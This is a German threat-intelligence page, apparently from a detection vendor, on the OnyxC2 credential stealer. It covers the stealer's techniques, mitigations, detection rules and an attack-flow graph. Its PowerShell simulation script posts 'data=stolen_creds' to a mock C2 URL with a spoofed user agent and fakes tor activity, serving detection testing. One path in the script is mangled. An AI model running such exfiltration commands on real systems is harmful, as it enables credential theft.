Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
OnyxC2 ist ein aufstrebender Malware-as-a-Service Stealer, der entwickelt wurde, um Zugangsdaten, Zwei-Faktor-Authentifizierungserweiterungen und Kryptowährungs-Wallets in etwa 210 Anwendungen zu stehlen. Die Plattform bietet ein vollwertiges kommerzielles Toolkit, einschließlich eines Management-Panels, Builders und Remote-Zugriffsfunktionalität. Sie verlässt sich außerdem auf fortschrittliche Ausweichmethoden, darunter DLL-Sideloading mit übergroßen signierten Binaries und verschlüsselten Payload-Komponenten.
Untersuchung
BlackFog-Forscher untersuchten mehrere OnyxC2-Proben und entdeckten eine DLL-Sideloading-Methode, die ein signiertes Host-Executable zusammen mit einer bösartigen 120 MB+ DLL missbraucht, die als NVIDIA-Grafikbibliothek getarnt ist. Netzwerkanalysen zeigten, dass die Malware über HTTPS mit einem bestimmten Backend-API-Endpunkt kommuniziert. Die Forscher fanden auch verschlüsselte Overlays, die in die DLL eingebettet sind, was der Malware hilft, einer unkomplizierten statischen Analyse zu entgehen.
Minderung
Das Einsetzen von Anti-Daten-Exfiltrationskontrollen am Endpunkt kann helfen, unautorisierte ausgehende Datenübertragungen unabhängig vom verwendeten Prozess zu blockieren. Sicherheitsteams sollten auf verdächtige DLL-Ladungen achten, die mit signierten Binaries in Verbindung stehen, und ungewöhnlich große Dateien in benutzerbeschreibbaren Pfaden untersuchen. Starke Anwendungskontrollrichtlinien und die Überwachung unautorisierter geplante Aufgaben werden ebenfalls empfohlen.
Reaktion
Wenn OnyxC2-Aktivitäten entdeckt werden, isolieren Sie das betroffene System sofort, um weiteren Datendiebstahl zu stoppen. Erfassen Sie einen vollständigen Speicherdump, um die entschlüsselte Nutzlast wiederherzustellen, und prüfen Sie auf aktive HVNC-Sitzungen oder SOCKS5-Proxytätigkeit. Überprüfen Sie alle kürzlich erstellten geplanten Aufgaben und untersuchen Sie die Anmeldedaten speichernde Anwendungen auf Anzeichen einer Kompromittierung.
graph TB %% Klassendefinitionen classDef action fill:#99ccff classDef builtin fill:#cccccc classDef malware fill:#ff9999 classDef discovery fill:#ccffcc classDef exfiltration fill:#ffff99 %% Initialzugriff und Ausführung action_user_exec[„<b>Aktion</b> – <b idea=’T1204.002’>Benutzerausführung: Schadsoftware-Datei</b><br/>Beschreibung: Opfer werden dazu verleitet,<br/>passwortgeschützte Archive herunterzuladen, die<br/>schädliche Installationsprogramme enthalten, die als legitime Software getarnt sind.“] class action_user_exec action action_side_loading[„<b idea=’T1574.002’>Manipulation des Ausführungsflusses: DLL Side-Loading</b><br/>Beschreibung: Verwendet eine legitime, digital signierte<br/>ausführbare Datei, um eine bösartige, aufgeblähte DLL<br/>mit dem Namen borlndmm.dll zu laden.“] class action_side_loading action malware_dll[„<b idea=’T1027.001’>Verschleierte Dateien oder Informationen: Binäres Padding</b><br/>Beschreibung: Die DLL wird auf über 120 MB aufgebläht und enthält<br/>legitime NVIDIA-Grafikfunktionen, um<br/>Sicherheitsscanner zu umgehen.“] class malware_dll malware %% Persistenz und Command-and-Control action_persistence[„<b idea=’T1547’>Persistenz</b><br/>Beschreibung: Verwendet optionale Funktionen für den<br/>automatischen Start über geplante Aufgaben.“] class action_persistence action action_c2[„<b idea=’T1071.001’>Command and Control: Anwendungsprotokoll</b><br/>Beschreibung: Beaconing zum Backend über HTTPS unter<br/>/backend/api/app.php, häufig unter Verwendung von Cloudflare<br/>als Tarnmechanismus.“] class action_c2 action %% Aufklärung und Credential Access action_discovery[„<b idea=’T1217’>Aufklärung</b><br/>Beschreibung: Sammelt Browserinformationen einschließlich<br/>gespeicherter Anmeldedaten und Cookies aus 45 verschiedenen<br/>Chromium- und Gecko-basierten Browsern.“] class action_discovery discovery action_cred_mgr[„<b idea=’T1555.005’>Credential Access: Zugangsdaten von Passwortmanagern</b><br/>Beschreibung: Zielt auf 5 verschiedene Passwortmanager-Anwendungen<br/>ab, um Anmeldedaten zu stehlen.“] class action_cred_mgr discovery action_lsass[„<b idea=’T1003.001’>Credential Access: Auslesen von Betriebssystem-Anmeldedaten</b><br/>Beschreibung: Erstellt einen Speicherabbild von LSASS,<br/>um Anmeldedaten zu erlangen.“] class action_lsass discovery %% Exfiltration action_exfil[„<b idea=’T1041’>Exfiltration über den C2-Kanal</b><br/>Beschreibung: Gestohlene Daten, einschließlich Passwörtern, Cookies<br/>und Wallet-Informationen, werden über die<br/>Anfrage action=up_d hochgeladen.“] class action_exfil exfiltration %% Verbindungsfluss action_user_exec –>|führt_zu| action_side_loading action_side_loading –>|nutzt| malware_dll malware_dll –>|etabliert| action_persistence action_persistence –>|initiiert| action_c2 action_c2 –>|löst_aus| action_discovery action_discovery –>|führt_zu| action_cred_mgr action_discovery –>|führt_zu| action_lsass action_cred_mgr –>|liefert_Daten_für| action_exfil action_lsass –>|liefert_Daten_für| action_exfil action_exfil –>|kommuniziert_über| action_c2
Angriffsflusssicherung
Erkennungen
Verdächtige Befehls- und Kontrollanfragen durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfragen (via DNS)
Ansicht
IOCs (HashSha256) zum Erkennen: Im Inneren von OnyxC2: Der neue Stealer, der 210 Apps ins Visier nimmt
Ansicht
IOCs (SourceIP) zum Erkennen: Im Inneren von OnyxC2: Der neue Stealer, der 210 Apps ins Visier nimmt
Ansicht
IOCs (DestinationIP) zum Erkennen: Im Inneren von OnyxC2: Der neue Stealer, der 210 Apps ins Visier nimmt
Ansicht
Erkennung der OnyxC2-Stealer C2-Kommunikation und TOR-Anonymisierung [Proxy]
Ansicht
Erkennung der OnyxC2-Geplanten-Aufgaben-Autorun- und Keylogger-Aktivität [Windows Prozess Erstellung]
Ansicht
Ausführung der Simulation
Voraussetzung: Der Telemetrie- und Basislinien-Vorflug-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Adversary-Technik (TTP), die darauf ausgelegt ist, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffs Szenario & Befehle: Der Angreifer versucht, gestohlene Browser-Anmeldedaten zu exfiltrieren. Um der Erkennung durch Netzwerk-Sicherheitsüberwachung zu entgehen, setzt er ein tragbares Tor-Binary ein, um einen anonymisierten Tunnel zu erstellen. Sobald der Tunnel aufgebaut ist, initiiert die Malware eine Verbindung zu ihrem Befehls- und Kontrollserver (C2). Um sich in legitimen Webverkehr einzufügen, fälscht die Malware ihre User-Agent-Informationen, um wie ein „Cloudflare“-Zugangspunkt auszusehen, und zielt auf einen speziellen API-Endpunkt, der hinter einem Cloudflare-Proxy gehostet wird. Diese Sequenz ist darauf ausgelegt, die Korrelation des Erkennungsregelwerks
torvon Befehlszeilenparametern und dem speziellen/backend/api/app.phpURL-Muster auszulösen. -
Regressionstestskript:
# Simulation der OnyxC2-Stealer-Kommunikation # 1. Simulation der Anwesenheit von Tor (Erstellen eines Dummy-Datei/Prozessverhaltens) # In einem realen Szenario wäre dies das tatsächliche tor.exe $TorPath = "$env:TEMPtor.exe" "Simulierter Tor-Binary-Inhalt" | Out-File -FilePath $TorPath # Erstellen eines Prozessausführungsereignisses für 'tor' über die Befehlszeile Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo running tor service" -WindowStyle Hidden # Um sicherzustellen, dass die Erkennungslogik 'command_line|contains: tor' trifft, # führen wir einen Befehl aus, der den String 'tor' enthält cmd.exe /c "echo initializing tor proxy..." # 2. Simulation der C2-Netzwerkverbindung # Wir verwenden PowerShell, um eine Netzwerkverbindung mit der speziellen URL und dem User-Agent zu simulieren $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "Versuche C2-Kommunikation zu $C2Url" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
Säuberungsbefehle:
# Entfernen simulierte Artefakte Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "Simulation Cleanup complete."